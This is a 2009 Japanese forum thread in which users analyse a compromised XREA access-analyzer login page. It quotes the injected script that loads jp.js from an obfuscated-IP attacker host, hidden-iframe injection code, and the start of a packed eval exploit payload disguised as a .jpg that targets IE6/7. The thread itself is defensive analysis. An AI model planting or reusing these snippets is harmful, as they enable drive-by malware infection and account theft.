【アクセス解析】AccessAnalyzer.com Part5【XREA】
情報元
ttp://pc11.2ch.net/test/read.cgi/hosting/1246828727/ 511 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー
ttp://ax.xrea.com/ のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?
514 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:04:42 0
>>511 </head>タグのちょうどうえ
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement('script');
js.src ="http://1856317799:888/jp.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>
</HEAD>
551 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:24:48 0
>>539 ax.xrea.comは2台だな。
219.101.229.188 ←やられてる
219.101.229.189 ←やられてない
なにそれ、こわい。
>>559 マジでまずいんじゃね?
キーロガーを仕込まれてる可能性がある場合、
どういう対処をすればいい?
>>559 キーロガー自体は脆弱性をついてるわけじゃない
>>560 一番安心安全なのはOS入れなおし
その後クリーンな環境になってからWebサービスのパスワードを全部変更
メールアドレスや各種ログインするサイト全て
mixiみたいなとこもね
確かに違う、これはおかしい
>nslookup ax.xrea.com
Non-authoritative answer:
Name: ax.xrea.com
Address: 219.101.229.189
Name: ax.xrea.com
Address: 219.101.229.188
>wget -qO-
http://219.101.229.189/login.php | md5; echo
219.101.229.189
b3782c67d6af86b38b06464f6ac9c10c ★これと
>wget -qO-
http://219.101.229.188/login.php | md5; echo
219.101.229.188
55d334703972573546362e8734be34f9 ★これが合わない
改ざん?されたらしいほうのところを調査
gifトロイやらなんやら一杯はいってるね。自己解凍cabが偽装されてたりするし
でも大体は最新にアップデートしてればおkかな
でも、一番の問題は、これかな
http://1856317799:888/dir2/go.jpg
一見拡張子からjpgファイルっぽいけど、
> more go.jpg
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e
以下長いので略
まぁ、スクリプトが偽装してある、これがまだ回避策のみでパッチがででてない虚弱性
972890
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx なのかな
のーとん先生が反応してくれたので急いでここにきた・・・
くそー、なんなんだお・・・\(^o^)/
一体どうしたというんだよ・・・
笑えるわ
vistaなら大丈夫なんだろ
Windows Vista または Windows Server 2008 を使用しているお客様については、
Internet Explorer でこのコントロールにデータを渡す機能が制限されているため、
この脆弱性の影響を受けません。
だってよ
XP\(^o^)/ オワタ
じわじわと何やられてんのかなーと調べ中。どうみてもあやしいjp.jsの中身を見てみる
>>563もそうだけど、大丈夫かは明確じゃないんでwindowsでは調べるのやらないほうがいいと思います。
とりあえず俺はFreeBSDなんでそれでやってます
>more jp.js
/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("J=")==-1)
{
var js = document.createElement('iframe');
js.src ="http:¥/¥/0x6EA52967:888/dir2/show.php";
width=0; height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
以下略
なんか差し込まれてるね
とはいえ、show.phpはさすがに何も吐いてこない、うーむ。さらに後ろを見てみる
var fr = document.createElement('iframe');
fr.src ="http:¥/¥/1856317799:888\/counter.htm";
width=0;
height=0;
try {document.getElementsByTagName('head')[0].appendChild(fr);}
なんか呼ばれてるcounter.htmをみてみる
<!-- shinobi ct2 -->
<script type="text/javascript" src="http://ct2.shinobi.jp/sc/1298877"></script>
<noscript><a href="
http://ct2.shinobi.jp/gg/1298877" target="_blank"><img src="
http://ct2.shinobi.jp/ll/1298877"
border="0" alt="<A5><AB><A5><A6><A5><F3><A5><BF><A9>`"></a></noscript>
<!-- /shinobi ct2 -->
ん? 忍者ツールだと……。
もうちょっと調べてみるかな。なにやってんだろうね
あ、
>>568で一部全角にしわすれた。不明瞭なリンクはクリックしないほうがいいと思います
ノートンがブロックしてくれてればセフセフ?
avast入れてアクセスしてみたけど反応ない。
引っかかってるのかなぁ・・・
MSはまだ正式対応してないけどパッチか何か公式で配布してたよね?
いろいろしらべていくと、あぁなるほど
で、
<script src='go.jpg'></script>
で、問題のjpgをスクリプトとして読み込ませてますね
他の関係なさそうなファイル見てみると
if(user.indexOf("msie 6")==-1&user.indexOf("msie 7")==-1)
ともあるので、
これも同じように、IE6とIE7の狙い撃ちかな? わざわざ律儀ですね
でも、whoisとかで調べていくと、
hellh.netということで、
おそらく、本体は、各種ネトゲのアカウントハックってところでしょうかね
ネトゲやってないと問題ない、なんて思っても、
この手のウイルスはレジストラに残るとネットワーク重くしたりといろいろうざいんで、
対応したほうがいいですね
とりあえず俺は大体わかったんで、ここまで